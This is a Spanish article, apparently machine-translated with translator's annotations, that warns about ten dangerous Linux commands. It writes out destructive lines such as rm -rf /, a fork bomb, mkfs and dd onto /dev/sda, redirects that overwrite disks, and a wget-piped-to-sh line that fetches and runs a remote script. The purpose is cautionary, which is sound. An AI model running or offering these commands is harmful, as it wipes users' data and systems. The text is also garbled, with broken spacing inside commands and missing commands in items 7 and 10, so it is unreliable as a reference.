Tenga cuidado en los comandos del sistema Linux. Comandos peligrosos de Linux

  
 

La línea de comandos de Linux es útil, eficiente y divertida, pero a veces peligrosa, especialmente si no está seguro de lo que está haciendo. Los siguientes comandos generalmente no tienen permiso para jugar estúpidamente hasta el extremo: bajo la identidad del usuario común, ¡la destrucción es solo la propia bodega de tres puntos de un acre!

1, comando rm-rf

El comando rm-rf es una de las formas más rápidas de eliminar una carpeta y su contenido. Solo un poco de error o ignorancia puede llevar a un colapso del sistema irrecuperable. Las siguientes son algunas de las opciones para el comando rm.

El comando rm se usa generalmente para eliminar archivos en Linux.

El comando rm-r borra recursivamente las carpetas, incluso las carpetas vacías.
(Anotación: personalmente piense que esto debería ser incorrecto, desde el sentido común, debería ser "incluso una carpeta no vacía")

el comando rm-f se puede eliminar sin preguntar y lsquo; solo lectura Archivo ’.
(Anotación: a los archivos de eliminación de Linux no les importa si el archivo es de solo lectura, pero si el directorio principal tiene permiso de escritura. Por lo tanto, el parámetro -f simplemente significa que no tiene que eliminar la confirmación una por una, sino que se eliminará de manera silenciosa. El comando rm original no elimina realmente la solicitud, pero la distribución general agregará rm por alias al parámetro -i para solicitar la confirmación de eliminación, y -f suprimirá esta solicitud.)

rm- Rf /: Fuerza la eliminación de todas las raíces en el directorio raíz.
(Es decir, después de eliminar, no hay nada … …)

rm-rf *: fuerza la eliminación de todos los archivos en el directorio actual.

rm-rf .: Fuerza la eliminación de la carpeta actual y sus subcarpetas.

De ahora en adelante, tenga cuidado cuando desee ejecutar el comando rm-rf. Podemos crear un alias rm-i en el comando " .bashrc " archivo ‘ rm ‘ para evitar accidentes al eliminar archivos con el comando ‘ rm ‘ el cual le pedirá que confirme cada solicitud de eliminación.
(Anotación: la mayoría de las distribuciones ya lo han hecho, si no, hágalo, y debe considerar lo que está haciendo antes de usar el parámetro -f. El traductor mismo tiene una lección de sangre y lágrimas.)



2,: () {:: &};: Command

Este es un ejemplo de una bomba de bifurcación. La operación específica es definir una función llamada ‘: ‘, se llamará a sí misma dos veces, una en primer plano y otra en segundo plano. Se ejecutará repetidamente hasta que el sistema se bloquee.


Oh? ¿Seguro que quieres probarlo? No experimente en el servidor oficial de la compañía ~~

3, Comando > /dev /sda

El comando anterior escribirá la salida de un ‘ comando ‘ Bloquear dispositivo /dev /sda. Esta operación reemplaza todos los bloques de datos en el dispositivo de bloque con los datos originales escritos por el comando, lo que resulta en la pérdida de datos para todo el dispositivo de bloque.

4, mv folder /dev /null

Este comando moverá algunas carpetas ‘ ‘ a /dev /null. En Linux, el dispositivo /dev /null o null es un archivo especial, todos los datos escritos en él se borrarán, y luego la operación de escritura será exitosa.
(Anotación: esto es un agujero negro. Por supuesto, debe tenerse en cuenta que al mover la carpeta al agujero negro, no impide el canje del software de recuperación de datos, por lo que la destrucción completa real requiere software o técnicas especiales para completar y mdash; — sé que definitivamente tienes algo que eliminar.)


El comando anterior moverá todos los contenidos del directorio de Usuario a /dev /null, lo que significa todo Ambos están involucrados en y rsquo; agujero negro (nulo).

5, wgethttp: //malware_source-O- sh

El comando anterior descargará un script de una fuente (quizás) maliciosa y lo ejecutará. El comando Wget descargará el script, y sh (incondicionalmente) ejecutará el script descargado.

Nota: siempre debe prestar atención a la fuente de su paquete de descarga o script. Utilice solo los scripts /programas que se descargan de una fuente confiable.
(Anotación: Entonces, ¿realmente sabe lo que está haciendo? Cuando se trata de esta necesidad, mi enfoque es simplificarlo, luego leeré lo que escribí y luego consideraré si implementarlo. )

6, mkfs.ext3 /dev /sda

el comando anterior formatear el dispositivo de bloque y lsquo; SDA y rsquo;, que sin duda sabe que su comando en la ejecución del bloque anterior El dispositivo (disco duro) será formateado, ¡nuevo! Sin ningún tipo de datos, deje que su sistema llegue a una fase irrecuperable.
(Anotación: por lo general, no use directamente dispositivos como /dev /sda, a menos que se use como un dispositivo sin formato, generalmente se debe dividir en sda1, sda2 y otras particiones. Por supuesto, si usa sda o sda1, entonces Mkfs es devastador para los dispositivos de bloque o particiones, y los datos anteriores se evaporarán.)

7, file

Los comandos anteriores a menudo se usan para vaciar el contenido del archivo. Por lo general, se utiliza para registrar la salida del comando, pero confirme que el archivo de salida esté vacío o no exista antes de la ejecución, de lo contrario, el archivo original no podrá recuperarse. &Mdash; — es posible que el software de recuperación de datos no pueda ayudarle. Además, creo que lo que realmente podría querer usar es " > > ", que agrega una nueva salida al archivo en lugar de actualizar ese archivo.). Si ingresa un error o una entrada ignorante con la ejecución anterior, el comando similar a " > xt.conf " sobrescribirá el archivo de configuración o cualquier otro archivo de configuración del sistema.

8, ^ foo ^ bar

Este comando se describe en nuestro poco conocido comando de Linux, Parte 3, que se usa para editar comandos ejecutados previamente sin tener que volver a reproducir todo el comando. Pero cuando usa el comando foobar, si no comprueba a fondo el riesgo de cambiar el comando original, esto puede causar problemas reales.
(Anotación: De hecho, este tipo de truco es lo que piensa el traductor, algunos piratas informáticos "ocultos" inútiles y dañinos dejados atrás en tiempos prehistóricos.)

9, ddif = /dev /randomof = /Dev /sda

El comando anterior escribirá un archivo basura aleatorio en el dispositivo de bloque sda ​​para borrar los datos. Por supuesto Su sistema puede estar en un estado de confusión e irrecuperable.
(Anotación: ¿recuerde que decir que mv to black hole no puede eliminar completamente los datos? ¡Entonces este comando le da un método completamente eliminado! Por supuesto, por motivos de seguro, puede sobrescribir varias veces).

10 , comandos ocultos

El siguiente comando es en realidad el primer comando anterior (rm-rf). El código aquí está oculto en hexadecimal, y un usuario ignorante puede ser engañado. Ejecutar el siguiente comando en el terminal puede borrar su partición raíz.

Este comando indica que el peligro real suele estar oculto y no se detectará fácilmente. Siempre debes tener en cuenta lo que estás haciendo y lo que sucederá. No compile /ejecute código de fuentes desconocidas.

Copyright © Conocimiento de Windows All Rights Reserved